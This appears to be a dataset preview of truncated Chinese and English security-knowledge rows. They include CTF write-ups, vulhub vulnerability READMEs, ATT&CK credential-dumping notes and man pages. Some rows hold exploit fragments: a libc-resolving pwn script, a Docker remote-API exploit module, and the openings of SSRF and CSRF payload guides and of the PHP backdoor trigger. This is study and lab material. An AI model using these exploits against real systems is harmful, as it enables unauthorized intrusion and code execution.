text stringlengths 100 9.93M | category stringclasses 11
values |
|---|---|
# Unauthorized, Exp, 100pts
> Let's do something simple. This media unit has a Wifi access point and looks like remote access is possible. But only if you know the right password.
Notes:
```
structure at 0x3001
sha256(password) - 0x20 bytes
address(username) - 2 bytes
size(username) + 1 - 2 bytes
username
```
We can ov... | sec-knowleage |
.\" DO NOT MODIFY THIS FILE! It was generated by help2man 1.28.
.TH SED "1" "2017年2月" "sed 4.4" "用户命令"
.SH 名称
sed \- 文本筛选和格式转换的流式编辑器
.SH 摘要
.B sed
[\fI选项\fR]... \fI{script-only-if-no-other-script} \fR[\fI输入文件\fR]...
.SH 描述
.ds sd \fIsed\fP
.ds Sd \fISed\fP
\*(Sd是一个流式编辑器。流式编辑器是用来在输入流(一个文件或者管道输入)中
完成基本文本转换的。当在一些允许脚本编辑的... | sec-knowleage |
# Apache HTTP Server 2.4.48 mod_proxy SSRF漏洞(CVE-2021-40438)
Apache HTTP Server是Apache基金会开源的一款流行的HTTP服务器。在其2.4.48及以前的版本中,mod_proxy模块存在一处逻辑错误导致攻击者可以控制反向代理服务器的地址,进而导致SSRF漏洞。
参考链接:
- https://httpd.apache.org/security/vulnerabilities_24.html
- https://firzen.de/building-a-poc-for-cve-2021-40438
- https://www.leavesongs.... | sec-knowleage |
# Based
General Skills, 200 points
## Description:
> To get truly 1337, you must understand different data encodings, such as hexadecimal or binary. Can you get the flag from this program to prove you are on the way to becoming 1337?
## Solution:
We connect to the service and get the following request:
```console
Let ... | sec-knowleage |
# T1003-004-windows-基于LSA凭证获取
## 来自ATT&CK的描述
具有SYSTEM访问主机权限的攻击者可能会尝试访问本地安全机构(LSA)机密,其中可能包含各种不同的凭据材料,例如服务帐户的凭据。LSA机密存储在注册表中HKEY_LOCAL_MACHINE\SECURITY\Policy\Secrets。LSA机密也可以从内存中转储。
Reg可用于从注册表中提取。Mimikatz可用于从内存中提取秘密。
### LSA(Local Security Authority)
通过system权限访问主机lsass.exe进程,可以从中读取本地登录和域登录的明文密码。当服务在本地或域用户的上下文中运行时,其密码存储... | sec-knowleage |
# PHP 8.1.0-dev 开发版本后门事件
PHP 8.1.0-dev 版本在2021年3月28日被植入后门,但是后门很快被发现并清除。当服务器存在该后门时,攻击者可以通过发送**User-Agentt**头来执行任意代码。
参考链接:
- https://news-web.php.net/php.internals/113838
- https://github.com/php/php-src/commit/c730aa26bd52829a49f2ad284b181b7e82a68d7d
- https://github.com/php/php-src/commit/2b0f239b211c7544ebc7a4cd2c... | sec-knowleage |
import hashlib
import itertools
import re
import string
from multiprocessing import freeze_support
from os import urandom
from time import time, sleep
from crypto_commons.brute.brute import brute
from crypto_commons.generic import xor_hex
from crypto_commons.netcat.netcat_commons import nc, receive_until_match, send, ... | sec-knowleage |
# 密码安全伪随机数生成器
## 介绍
密码学安全伪随机数生成器(cryptographically secure pseudo-random number generator,CSPRNG),也称为密码学伪随机数生成器(cryptographic pseudo-random number generator,CPRNG),是一种特殊的伪随机数生成器。它需要满足满足一些必要的特性,以便于适合于密码学应用。
密码学的很多方面都需要随机数
- 密钥生成
- 生成初始化向量,IV,用于分组密码的 CBC,CFB,OFB 模式
- nounce,用于防止重放攻击以及分组密码的 CTR 模式等、
- [one-time pad... | sec-knowleage |
### IDA 动态调试原生层程序
这里我们会介绍如何调试以下种类的程序
- 基本的原生层程序,即简单的 C/C++ 程序。
- 原生 so 程序
### IDA 动态调试基本原理
在使用 ida 动态调试原生层程序时,主要会使用到 android_server 程序。该程序会使用 ptrace 技术注入到要调试的程序中。
每一个进程都有一个 status 文件,其中有一字段 TracerPid 用来标识该进程是被哪个进程 ptrace 了。如果没有被其他进程 ptrace,那么就返回 0,否则返回对应进程的 pid。
### IDA 动态调试基本环境搭建
无论是调试什么原生层程序,基本的环境搭建都是类似的,需要确保 IDA 与手机... | sec-knowleage |
# GhostScript 沙箱绕过(命令执行)漏洞(CVE-2018-19475)
2018年底来自Semmle Security Research Team的Man Yue Mo发表了CVE-2018-16509漏洞的变体CVE-2018-19475,可以通过一个恶意图片绕过GhostScript的沙盒,进而在9.26以前版本的gs中执行任意命令。
参考链接:
- https://blog.semmle.com/ghostscript-CVE-2018-19475/
- https://bugs.ghostscript.com/show_bug.cgi?id=700153
## 漏洞环境
执行如下命令启动漏洞环境(其中... | sec-knowleage |
# Apache APISIX's Admin API default access token vulnerability (CVE-2020-13945)
[中文版本(Chinese version)](README.zh-cn.md)
Apache APISIX is a dynamic, real-time, high-performance API gateway. Apache APISIX has a default built-in API token `edd1c9f034335f136f87ad84b625c8f1` that can be used to access all the admin API, ... | sec-knowleage |
# 隐蔽通讯的检测
## 基于DNS隐蔽信道的攻击与检测
### 检测
#### 思路
- 使用字符频率分析
- 基于统计量的行为分析
#### 工具
##### [BotDAD](https://github.com/mannirulz/BotDAD)
- 统计分析了15种DNS的行为特征
| 序号 | DNS特征 | 描述 |
| :--: | :---------------------------------------: | :---... | sec-knowleage |
# 栈溢出原理
## 介绍
关于栈的介绍,可以阅读 [Linux Pwn](https://ctf-wiki.org/pwn/linux/user-mode/stackoverflow/x86/stack-intro/) 中的介绍。
## 基本示例
下面给出一个典型例子,在这个例子中由于变量声明的顺序和 buffer 声明的大小导致存在最后一字节的溢出。
```c
#include <stdio.h>
#include <string.h>
#define PASSWORD "666666"
int verify_password(char *password)
{
int authenticated;
char buff... | sec-knowleage |
## Hashdesigner (Crypto, 70p)
There was this student hash design contest. All submissions were crap, but had promised
to use the winning algorithm for our important school safe. We hashed our password and
got '00006800007d'. Brute force isn't effective anymore and the hash algorithm had to
be collision-resistant... | sec-knowleage |
# Memcached未授权访问漏洞
## 漏洞描述
Memcached是一个高速缓存系统,用于存储网络上的大量动态数据。未授权访问漏洞指的是,在没有对Memcached的访问控制的情况下,任意人可以在未经授权的情况下访问和读取存储在Memcached中的数据。这可能导致敏感信息泄露,包括用户密码、信用卡信息等。
## 环境搭建
```
wget http://memcached.org/files/old/memcached-1.4.14.tar.gz
tar -zxvf memcached-1.4.14.tar.gz
cd memcached-1.4.14.tar.gz
./configure && make && make t... | sec-knowleage |
**Authors**: < [nixawk](https://github.com/nixawk) >, < [binarymist](https://github.com/binarymist) >, < [bkimminich](https://github.com/bkimminich) >
----
# Exploitation Tools
`Exploitation` is probably one of the most glamorous parts of a penetration test, yet it is often done with brute force rather than with precis... | sec-knowleage |
# auditd
---
## auditd.conf
```bash
# 目录或这个目录中的日志文件。
log_file =/var/log/audit/audit.log
# 日志所属组
log_group = root
# 审计应采用多少优先级推进守护进程。必须是非负数。0表示没有变化。
priority_boost = 4
# 多长时间向日志文件中写一次数据。值可以是 NONE、INCREMENTAL、DATA 和 SYNC 之一。如果设置为 NONE,则不需要做特殊努力来将数据 刷新到日志文件中。
# 如果设置为 INCREMENTAL,则用 freq 选项的值确定多长时间发生一次向磁盘的刷新。
# 如果设置为 DATA,... | sec-knowleage |
# KeyGenMe
Reversing, 439 points
## Description:
A binary file was attached, in addition to an address and port.
## Solution:
Let's run the binary:
```console
root@kali:/media/sf_CTFs/tamu/NoCCBytes# ./noccbytes
Welcome. Please Enter a password to continue:
test
Wrong Password
```
It's always a good idea to get some in... | sec-knowleage |
# Server-Side Request Forgery
> Server Side Request Forgery or SSRF is a vulnerability in which an attacker forces a server to perform requests on their behalf.
## Summary
* [Tools](#tools)
* [Payloads with localhost](#payloads-with-localhost)
* [Bypassing filters](#bypassing-filters)
* [Bypass using HTTPS](#bypass-u... | sec-knowleage |
# 执行系统命令
os.execute 可以执行 dos 命令,但是返回的是系统状态码,默认输出。
```lua
os.execute('whoami')
os.execute('ls -l')
os.execute("copy" .. originalPath .. "," .. backupPath)
```
`io.popen()` 也可以执行 dos 命令,但是返回一个文件。
```lua
local t = io.popen('svn help')
local a = t:read("*all")
--a返回一个字符串,内容是svn help的内容
```
如果想执行某命令或程序可选 `os.execute()`, 如果还... | sec-knowleage |
# Spark 未授权访问漏洞
## 漏洞描述
Apache Spark是一款集群计算系统,其支持用户向管理节点提交应用,并分发给集群执行。如果管理节点未启动访问控制,攻击者可以在集群中执行任意代码。该漏洞的本质是未授权用户可以向Master节点提交一个应用,Master节点会分发给Slave节点执行应用。如果应用中包含恶意代码,会导致任意代码执行,威胁Spark集群整体的安全性。
## 环境搭建
```
git clone https://github.com/vulhub/vulhub.git
cd /opt/vulhub-master/spark/unacc/
docker-compose up
```
## 漏洞检测
环境... | sec-knowleage |
version: '2.3'
services:
redis:
image: redis:5.0.9-alpine
postgresql:
image: postgres:12-alpine
environment:
- POSTGRES_USER=gitlab
- POSTGRES_PASSWORD=password
- POSTGRES_DB=gitlabhq_production
- DB_EXTENSION=pg_trgm,btree_gist
gitlab:
image: vulhub/gitlab:13.10.1
depends_o... | sec-knowleage |
# 1_wanna_b3_a_r0ck5tar
General Skills, 350 points
## Description:
> I wrote you another song. Put the flag in the picoCTF{} flag format
```
Rocknroll is right
Silence is wrong
A guitar is a six-string
Tommy's been down
Music is a billboard-burning razzmatazz!
Listen... | sec-knowleage |
# MHN蜜罐
MHN(Modern Honey Network):开源蜜罐,简化蜜罐的部署,同时便于收集和统计蜜罐的数据。用ThreatStream来部署,数据存储在MOngoDB中,安装了入侵检测系统的部署传感器Snort、Kippo、Conpot和Dionaea。收集的信息可以通过Web接口进行展示。
[github地址](https://github.com/threatstream/mhn)
### 支持蜜罐类型
* Snort
* Suricata
* Dionaea
* Conpot
* Kippo
* Amun
* Glastopf
* WordPot
* ShaockPot
* P0f
### MHN架构
![mh... | sec-knowleage |
package org.vulhub;
import org.springframework.boot.SpringApplication;
import org.springframework.boot.autoconfigure.SpringBootApplication;
@SpringBootApplication
public class Application {
public static void main(String[] args) {
SpringApplication.run(Application.class, args);
}
} | sec-knowleage |
# Scrapyd Pre-Auth Remote Code Execution
[中文版本(Chinese version)](README.zh-cn.md)
Scrapyd is an application for deploying and running Scrapy spiders. It enables users to deploy (upload) projects and control their spiders using a JSON API.
References: <https://www.leavesongs.com/PENETRATION/attack-scrapy.html>
## St... | sec-knowleage |
# Rend Asunder - FLAG0
## 0x00 Home

## 0x01 Hey! Show me source code!
```
document.write(document.getElementsByTagName('html')[0].innerHTML);
```

The HTML tags don't seem to be used.
## 0x02 Is there secret javascript?
```
document.write(document.getElementsByTagName('script')[... | sec-knowleage |
### 创建一个组件
```jsx
import React,{Component} from 'react';
import ReactDOM from 'react-dom';
```
我们在文件头部从 react 的包当中引入了 React ,和 React.js 的组件父类 Component 只要你要写React.js组件,那么就必须要引入这两个东西。
`react-dom`可以帮助我们把这个用来描述 UI 信息的 JavaScript 对象(React 组件)变成 DOM 元素,并且渲染到页面上去。
所以可以总结一下从 JSX 到页面到底经过了什么样的过程
<img src='http://huzidaha.gith... | sec-knowleage |
# Election 1
> https://download.vulnhub.com/election/election.7z
靶场IP:``
扫描对外端口服务
```
┌──(root💀kali)-[/tmp]
└─# nmap -p 1-65535 -sV 192.168.32.231 ... | sec-knowleage |
---
title: 利用 IAM 进行权限提升
---
<center><h1>利用 IAM 进行权限提升</h1></center>
---
如果当前用户具备编辑 IAM 策略的权限,但没有某些服务权限的话,那么可以在 IAM 中开启这个服务权限,以实现提权。
例如下面这个用户,在打开 EC2 时提示我们没有权限。
</br><img width="1000" src="/img/1651980039.png"></br>
但是这个用户是具有 IAM 的编辑权限的,因此我们可以将 AmazonEC2FullAccess 权限赋予给这个用户
</br><img width="800" src="/img/1651980063.pn... | sec-knowleage |
# 弱类型
---
**相关文章 & Source & Reference**
- [PHP弱类型你真的懂了吗?](https://mp.weixin.qq.com/s/eGPBCF6AmJ0Sb1Yd_sjVnw)
- [php 弱类型总结](https://www.cnblogs.com/mrsm1th/p/6745532.html)
- [PHP弱类型hash比较缺陷](https://www.cnblogs.com/yesec/p/12232075.html)
- [ctf php弱类型、松散比较、哈希缺陷、MD5绕过、变量覆盖](https://blog.csdn.net/q20010619/article/details... | sec-knowleage |
version: '2'
services:
discuz:
image: vulhub/discuz:x3.4
depends_on:
- db
ports:
- "80:80"
db:
image: mysql:5.5
environment:
MYSQL_ROOT_PASSWORD: root
MYSQL_DATABASE: ultrax | sec-knowleage |
# T1003-win-使用Windows任务管理器转储Lsass.exe内存
## 来自ATT&CK的描述
凭据转储是从操作系统和软件获取账号登录名和密码(哈希或明文密码)信息的过程。然后可以使用凭据来执行横向移动并访问受限制的信息。
攻击者和专业安全测试人员都可能会使用此技术中提到的几种工具。也可能存在其他自定义工具。
## 测试案例
lsass.exe的内存经常被转储用于离线凭证窃取攻击。这可以通过Windows任务管理器和管理权限来实现
## 检测日志
暂无, 经过实际测试,未发现存在windows安全日志记录,未对其他类型日志进行分析。
## 测试复现
按照这些步骤执行:
1. 打开任务管理器:在Windows系统上,这可... | sec-knowleage |
basename
===
打印目录或者文件的基本名称
## 补充说明
**basename命令** 用于打印目录或者文件的基本名称。basename和dirname命令通常用于shell脚本中的命令替换来指定和指定的输入文件名称有所差异的输出文件名称。
### 语法
```shell
basename(选项)(参数)
```
### 选项
```shell
--help:显示帮助;
--version:显示版本号。
```
### 参数
* 文件:带路径信息的文件;
* 后缀:可选参数,指定要去除的文件后缀字符串。
### 实例
1、要显示一个shell变量的基本名称,请输入:
```shell
basename $WORK... | sec-knowleage |
## Impossible (web, 225p)
### PL
[ENG](#eng-version)
Według opisu zadania, flaga jest schowana na stronie http://impossible.asis-ctf.ir/
Możemy tam zakładać konta, ale muszą one zostać aktywowane żeby się zalogować.
Jak zwykle zaczynamy od ściągnięcia `robots.txt` aby sprawdzić co autorzy strony chcą przed nami ukryć.
... | sec-knowleage |
# 计算机相关的编码
本节介绍一些计算机相关的编码。
## 字母表编码
- A-Z/a-z 对应 1-26 或者 0-25
## ASCII 编码
### 特点
我们一般使用的 ascii 编码的时候采用的都是可见字符,而且主要是如下字符
- 0-9, 48-57
- A-Z, 65-90
- a-z, 97-122
### 变形
#### 二进制编码
将 ascii 码对应的数字换成二进制表示形式。
- 只有 0 和 1
- 不大于 8 位,一般 7 位也可以,因为可见字符到 127。
- 其实是另一种 ascii 编码。
#### 十六进制编码
将 ascii 码对应的数字换成十六进制表示形式。
- A-Z-->0x41~0x5... | sec-knowleage |
# Static
* Category: Cloud
* 200 Points
* Solved by the JCTF Team
## Description
> This is only a static bitcoin currency site.
>
> What can go wrong?
## Solution
The description isn't lying, the attached website is just a static website about bitcoins. Nothing interesting there. However, the challenge category is "cl... | sec-knowleage |
# 流量分析
<p align="center">
<img src="../../../../assets/img/banner/流量分析.jpg" width="80%">
</p>
> 注 : 笔记中流量包 pcapng 源文件在其图片目录下
---
## 免责声明
`本文档仅供学习和研究使用,请勿使用文中的技术源码用于非法用途,任何人造成的任何负面影响,与本人无关.`
---
**相关工具**
- [Wireshark](../../安全工具/Wireshark.md)
- [odedshimon/BruteShark](https://github.com/odedshimon/BruteShark)
- 火绒剑
... | sec-knowleage |
.\" DO NOT MODIFY THIS FILE! It was generated by help2man 1.48.5.
.\"*******************************************************************
.\"
.\" This file was generated with po4a. Translate the source file.
.\"
.\"*******************************************************************
.TH WHO 1 2022年9月 "GNU coreutils 9.1"... | sec-knowleage |
# Signature server (crypto, 28 solved, 148p)
```
Quantum computing is on its way.
That's why i implemented a post-quantum signature server.
However, I believe Winternitz checksum can be broken, so I tweaked it a bit.
Sign all you want, it's free!
nc crypto-02.v7frkwrfyhsjtbpfcppnu.ctfz.one 1337
```
## Analysis
In th... | sec-knowleage |
# 公钥指数相关攻击
## 小公钥指数攻击
### 攻击条件
e 特别小,比如 e 为 3。
### 攻击原理
假设用户使用的密钥 $e=3$。考虑到加密关系满足:
$$
c\equiv m^3 \bmod N
$$
则:
$$
\begin{align*}
m^3 &= c+k\times N\\
m &= \sqrt[3]{c+k\times n}
\end{align*}
$$
攻击者可以从小到大枚举 $k$,依次开三次根,直到开出整数为止。
### 范例
这里我们以 XMan 一期夏令营课堂练习为例进行介绍(Jarvis OJ 有复现),附件中有一个 `flag.enc` 和 `pubkey.pem`,很明显是密文和公钥了,... | sec-knowleage |
grpck
===
用于验证组文件的完整性
## 补充说明
**grpck命令** 用于验证组文件的完整性,在验证之前,需要先锁定(lock)组文件`/etc/group`和`/etc/shadow`。
grpck命令检查数据是否正确存放,每条记录是否都包含足够的信息,是否有一个唯一的组名,是否包含正确的用户,是否正确设置了组的管理员等。grpck检查发现错误以后,在命令行提示用户是否删除错误的记录。如果用户没有明确回答删除记录,grpck终止运行。
### 语法
```shell
grpck(选项)
```
### 选项
```shell
-r:只读模式;
-s:排序组id。
```
### 实例
对组账号和影子文件进行验证... | sec-knowleage |
---
title: Sakis 3G
categories: Hardware Hacking
tags: [Sakis3G,Hardware Hacking,kali linux]
date: 2019-06-25 11:21:00
---
0x00 Sakis 3G介绍
-------------
Sakis3G是一个调整过的,即装即用的shell脚本,理论而言可以在任意调制解调器与运营商之间建立3G连接。它可以自动地配置好你的调制解调器或蓝牙模块,甚至可以检测运营商配置。在其他措施都失败之后,可以考虑使用这个工具。
~~Sakis3G主页~~ | [Kali上的Sakis3G软件库](http://git.kali.org/... | sec-knowleage |
原文 by PHITH0N
## 0x00 前言
近期由于在开发自己的webshell,所以对PHP一些已有的漏洞进行了一定的研究,并且也自己发现了部分PHP存在的安全隐患。这篇文章我来与大家分享一下自己对于PHP中open_basedir 绕过并列举目录的方法总结。
## 0x01 open_basedir的简介
Open_basedir是PHP设置中为了防御PHP跨目录进行文件(目录)读写的方法,所有PHP中有关文件读、写的函数都会经过open_basedir的检查。Open_basedir实际上是一些目录的集合,在定义了open_basedir以后,php可以读写的文件、目录都将被限制在这些目录中。
设置open_b... | sec-knowleage |
# T1587-003-开发能力-数字证书
## 来自ATT&CK的描述
攻击者可能会创建自签名SSL/TLS证书,可在攻击目标期间使用。SSL/TLS证书旨在传输信任。它们包括有关密钥的信息、有关其所有者身份的信息以及已验证证书内容、正确的实体的数字签名。如果签名有效,并且检查证书的人信任签名者,那么他们知道他们可以使用该密钥与其所有者进行通信。在自签名的情况下,数字证书将缺乏与第三方证书颁发机构 (CA) 签名相关联的信任元素。
攻击者可能会创建自签名SSL/TLS证书,可用于进一步操作,例如加密C2流量(例如:使用Web协议的非对称加密),或者如果添加到信任根,甚至启用中间人(即安装根证书)。
创建数字证书后,攻击者可以在其控... | sec-knowleage |
### Coppersmith 相关攻击基本原理
Coppersmith 相关攻击与[Don Coppersmith](https://en.wikipedia.org/wiki/Don_Coppersmith) 紧密相关,他提出了一种针对于模多项式(单变量,二元变量,甚至多元变量)找所有小整数根的多项式时间的方法。
这里我们以单变量为主进行介绍,假设
- 模数为 N ,N 具有一个因子 $b\geq N^{\beta},0< \beta \leq 1$
- 多项式 F 的次数为 $\delta$
那么该方法可以在$O(c\delta^5log^9(N))$ 的复杂度内找到该多项式所有的根$x_0$,这里我们要求 $|x_0|<cN... | sec-knowleage |
.\" auto-generated by docbook2man-spec $Revision: 1.1 $
.TH "CREATE USER" "7" "2003-11-02" "SQL - Language Statements" "SQL Commands"
.SH NAME
CREATE USER \- 创建一个新的数据库用户帐户
.SH SYNOPSIS
.sp
.nf
CREATE USER \fIname\fR [ [ WITH ] \fIoption\fR [ ... ] ]
where \fIoption\fR can be:
SYSID \fIuid\fR
| [ ENCRYPTED | ... | sec-knowleage |
.\" auto-generated by docbook2man-spec $Revision: 1.1 $
.TH "DROP TYPE" "7" "2003-11-02" "SQL - Language Statements" "SQL Commands"
.SH NAME
DROP TYPE \- 删除一个用户定义数据类型
.SH SYNOPSIS
.sp
.nf
DROP TYPE \fIname\fR [, ...] [ CASCADE | RESTRICT ]
.sp
.fi
.SH "DESCRIPTION 描述"
.PP
\fBDROP TYPE\fR 将从系统表里删除用户定义的类型。 只有类型所有者可以删除类型。... | sec-knowleage |
'\"
'\" Copyright (c) 1993 The Regents of the University of California.
'\" Copyright (c) 1994-1996 Sun Microsystems, Inc.
'\"
'\" See the file "license.terms" for information on usage and redistribution
'\" of this file, and for a DISCLAIMER OF ALL WARRANTIES.
'\"
'\" RCS: @(#) $Id: source.n,v 1.2 2003/11/24 05:10:00... | sec-knowleage |
# 35C3 Junior CTF (2018)
Various writeups for the 2018 35C3 Junior CTF.
Finished #52 out of 520 participants. | sec-knowleage |
'\"
'\" Copyright (c) 1993 The Regents of the University of California.
'\" Copyright (c) 1994-1996 Sun Microsystems, Inc.
'\"
'\" See the file "license.terms" for information on usage and redistribution
'\" of this file, and for a DISCLAIMER OF ALL WARRANTIES.
'\"
'\" RCS: @(#) $Id: tell.n,v 1.2 2003/11/24 05:10:00 b... | sec-knowleage |
# Cross-Site Request Forgery
> Cross-Site Request Forgery (CSRF/XSRF) is an attack that forces an end user to execute unwanted actions on a web application in which they're currently authenticated. CSRF attacks specifically target state-changing requests, not theft of data, since the attacker has no way to see the resp... | sec-knowleage |
# Lord of the Root 1.0.1
下载地址:https://download.vulnhub.com/lordoftheroot/LordOfTheRoot\_1.0.1.ova
## 信息收集
发现靶场IP地址:`192.168.32.153`

扫描对外端口,发现只开启22端口。

SSH连接,发现这段提示:`... | sec-knowleage |
.\" This man page is Copyright (C) 1999 Andi Kleen .
.\" Permission is granted to distribute possibly modified copies
.\" of this page provided the header is included verbatim,
.\" and in case of nontrivial modification author and date
.\" of the modification is added to the header.
.TH PACKET(7) Linux Programmer's Man... | sec-knowleage |
# T1070-001-windows-清除事件日志
## 来自ATT&CK的描述
攻击者可能试图阻止由监测软件或进程捕获到的告警,以及事件日志被收集和分析。这可能包括修改配置文件或注册表项中的监测软件的设置,以达到逃避追踪的目的。
在基于特征监测的情况下,攻击者可以阻止监测特征相关的数据被发送出去,以便于阻止安全人员进行分析。这可以有很多方式实现,例如停止负责转发的进程(splunk转发器、Filebate、rsyslog等)。
具体案例,你可以参考绕过sysmon相关的文章。(PS:英语不好、谷歌翻译真心,,,太难了)。
## 测试案例
在正常的操作期间内,事件日志不太可能会被刻意清除。但是恶意攻击者可能会通过清除事件日志来尝试... | sec-knowleage |
---
title: dnsenum
categories: Information Gathering
tags: [dns,kali linux,dnsenum,information gathering,recon]
date: 2016-10-20 11:00:00
---
0x00 dnsenum介绍
-------------
多线程perl脚本枚举域的DNS信息并发现非连续的IP段工具
主要功能:
```plain
- 获取主机的地址(A记录)
- 获取名称服务器(线程)
- 获取MX记录(线程化)
- 对名称服务器执行axfr查询并获取BIND VERSION(线程化)
- 通过Google抓取获取额外的名... | sec-knowleage |
# T1105-win-入口工具转移-AppInstaller.exe(白名单、失效)
## 来自ATT&CK的描述
攻击者可能会将工具或其他文件从外部系统转移到被攻击的环境中。可以通过命令和控制通道从外部攻击者控制的系统复制文件,用以将工具带入被攻击的网络中,或通过其他工具(如 FTP)的替代协议。 也可以使用 scp、rsync 和 sftp等本地工具在Mac和 Linux上复制文件。
## 测试案例
AppInstaller.exe用于在 Windows 10 上安装AppX/MSIX应用程序的工具。
**路径:**
```
C:\Program Files\WindowsApps\Microsoft.DesktopAppIn... | sec-knowleage |
# Firmware
RE
## Description:
> After unpacking the firmware archive, you now have a binary in which to go hunting. Its now time to walk around the firmware and see if you can find anything.
A binary file was attached.
## Solution:
Let's inspect the binary file:
```console
root@kali:/media/sf_CTFs/google/firmware# file... | sec-knowleage |
# time 包
---
**Source & Reference**
- [Go语言time包:时间和日期](http://c.biancheng.net/view/5392.html)
---
time 包为我们提供了一个数据类型 time.Time(作为值使用)以及显示和测量时间和日期的功能函数.
当前时间可以使用 `time.Now()` 获取,或者使用 `t.Day()`、`t.Minute()` 等等来获取时间的一部分;甚至可以自定义时间格式化字符串,例如:`fmt.Printf("%02d.%02d.%4d\n", t.Day(), t.Month(), t.Year())` 将会输出 21.07.2011.
Dura... | sec-knowleage |
# HTML
超文本标记语言(HyperText Markup Language)是一种用于创建网页的标准标记语言,
您可以使用 HTML 来建立自己的 WEB 站点,HTML 运行在浏览器上,由浏览器来解析
### 什么是 HTML?
> HTML 是用来描述网页的一种语言
- HTML 指的是超文本标记语言 (Hyper Text Markup Language)
- HTML 是用来描述网页的一种语言
- HTML 不是一种编程语言,而是一种标记语言 (markup language)
- 标记语言是一套标记标签 (markup tag)
- HTML 使用标记标签来描述网页
### HTML 文件
- HTML... | sec-knowleage |
# H2 Database Web Console Unauthorized Access
[中文版本(Chinese Version)](README.zh-cn.md)
H2 database is a embedded in-memory database in Java. Springboot with h2 database comes with a web management page which has no authentication if you set the following options:
```
spring.h2.console.enabled=true
spring.h2.console.... | sec-knowleage |
# XSS
## 反射型XSS
下面是一个简单的 Spring Boot Web 应用,其中包含了一个含有 XSS 漏洞的请求处理器。
在这个应用中,我们通过 GET 请求方式访问 `/xss` 接口,输入参数会被直接输出到 HTML 页面中。如果输入参数中包含了恶意脚本,那么这些脚本就会被执行,从而导致 XSS 攻击。
```java
package com.example.controller;
import org.springframework.web.bind.annotation.GetMapping;
import org.springframework.web.bind.annotation.RequestParam... | sec-knowleage |
### 前言:
在团体渗透测试的项目中,如红蓝对抗,团队渗透测试比赛等,最重要的是过程与结果实时共享于团队,例如:A同学nmap目标站,B同学也nmap目标站,这在对抗比赛中是极其浪费时间也是非常容易引起防火墙,日志服务器或其他设备的警觉。所以打算写一系列关于未来团队渗透的对抗。争取做到过程与结果,团队实时共享。把曾经的团队作战经验形成一个适应对抗,比赛等的参考。

### BloodHound简介:
BloodHound是2016年出现大家的视线中,它是一个分析和解读AD中权限关系的一个工具。对于攻击者来说,能快速的获取到域中的线索以便进... | sec-knowleage |
from __future__ import print_function
import requests
import logging
import json
import urllib.parse
# NOTE
# Enable Remote API with the following command
# /usr/bin/dockerd -H tcp://0.0.0.0:2375 -H unix:///var/run/docker.sock
# This is an intended feature, remember to filter the port 2375..
name = "docker"
... | sec-knowleage |
#!/usr/bin/env python
from Crypto.Util.number import *
from flag import flag
import gmpy2
def serifin(a, l):
S, s = a, a
while True:
S += float(a)/float(l)
if S - s < .0001:
return int(S) + 1
else:
s, a = S, float(a)/float(l)
def genPrime(nbit):
while True:... | sec-knowleage |
from pwn import *
if 0:
r = remote("52.30.206.11", 31337)
elf = ELF("./libc.so")
else:
r = process(["./bot", "0"])
elf = ELF("/lib/i386-linux-gnu/libc.so.6")
ELF_SYSTEM = elf.symbols["system"]
ELF_PUTS = elf.symbols["puts"]
first = listen(8888)
second = listen(9999)
IP = "127.0.0.1"
def sendx(s):
... | sec-knowleage |
rsync
===
远程数据同步工具
## 补充说明
**rsync命令** 是一个远程数据同步工具,可通过LAN/WAN快速同步多台主机间的文件。rsync使用所谓的“rsync算法”来使本地和远程两个主机之间的文件达到同步,这个算法只传送两个文件的不同部分,而不是每次都整份传送,因此速度相当快。 rsync是一个功能非常强大的工具,其命令也有很多功能特色选项,我们下面就对它的选项一一进行分析说明。
### 语法
```shell
rsync [OPTION]... SRC DEST
rsync [OPTION]... SRC [USER@]host:DEST
rsync [OPTION]... [USER@]HOST:SRC D... | sec-knowleage |
# RSA Chained (crypto, 312p, 21 solved)
In the challenge we get [source code](task.py) and [results](output.txt).
The code generates 4 distinctive multiprime RSA keys and encrypts the flag via series of encryptions done with those keys.
For each of the keys we know public key and `d % 2^1050`, so we have a problem know... | sec-knowleage |
## Limitless (web, 200p)
### PL
[ENG](#eng-version)
W zadaniu dostajemy link do webowego uploadera plików, oraz informacje, że mamy wyciągnąć jakieś informacje z tabeli `flag`.
Analiza uploadera oraz jego działania pozwala zauważyć, że uploader po załadowaniu pliku pobiera z niego dane `exif` a następnie na podstawie ... | sec-knowleage |
# Kernel ROP
ROP即```返回导向编程```(Return-oriented programming),应当是大家比较熟悉的一种攻击方式——通过复用代码片段的方式控制程序执行流。
**内核态的 ROP 与用户态的 ROP 一般无二,只不过利用的 gadget 变成了内核中的 gadget,所需要构造执行的 ropchain 由** `system("/bin/sh")` **变为了** `commit_creds(&init_cred)` 或 `commit_creds(prepare_kernel_cred(NULL))`,当我们成功地在内核中执行这样的代码后,当前线程的 cred 结构体便变为 init 进程的 c... | sec-knowleage |
# T1567-win-通过Web服务进行渗透-DataSvcUtil.exe(白名单)
## 来自ATT&CK的描述
攻击者可能使用现有的合法外部Web服务而不是他们的主要命令和控制通道来窃取数据。 由于网络中的主机可能在受到攻击之前已经与它们进行通信,因此流行Web服务可能充当渗漏机制的提供大量掩护。 防火墙规则也可能已经存在以允许这些服务的流量。
Web 服务提供商通常也使用 SSL/TLS 加密,为攻击者提供更高级别的保护。
## 测试案例
DataSvcUtil.exe是WCF数据服务提供的命令行工具,它使用开放数据协议(OData)源,并生成从.NET Framework客户端应用程序访问数据服务所需的客户端数据服务类... | sec-knowleage |
# ActiveMQ Deserialization Vulnerability (CVE-2015-5254)
[中文版本(Chinese version)](README.zh-cn.md)
Apache ActiveMQ is an open source messaging middleware developed by the American Pachitea (Apache) Software Foundation that supports Java messaging services, clustering, Spring framework, and more.
Apache ActiveMQ versi... | sec-knowleage |
# 计算机操作系统 - 链接
<!-- GFM-TOC -->
* [计算机操作系统 - 链接](#计算机操作系统---链接)
* [编译系统](#编译系统)
* [静态链接](#静态链接)
* [目标文件](#目标文件)
* [动态链接](#动态链接)
<!-- GFM-TOC -->
## 编译系统
以下是一个 hello.c 程序:
```c
#include <stdio.h>
int main()
{
printf("hello, world\n");
return 0;
}
```
在 Unix 系统上,由编译器把源文件转换为目标文件。
```bash
gcc -o hel... | sec-knowleage |
# Summary
* [前端大宝书](./README.md)
* HTML
- [第一小节:Hello HTML](./git/HTML+CSS/1-hello-html.md)
- [第二小节:HTML 头部](./git/HTML+CSS/2-html-head.md)
- [第三小节:元素与属性](./git/HTML+CSS/3-element.md)
- [第四小节:常用的元素](./git/HTML+CSS/4-elements.md)
* 第一章 Linux基础
- [第一小节:Linux 命令行](./git/Linux/1-linux.md)
- [第二小节:文件系统结构](./git/Linux/... | sec-knowleage |
